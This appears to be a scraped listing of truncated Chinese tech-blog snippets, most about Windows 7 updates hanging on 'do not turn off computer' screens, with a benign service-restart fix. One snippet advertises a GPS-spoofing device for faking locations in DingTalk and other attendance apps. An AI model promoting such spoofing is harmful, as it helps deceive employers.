2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57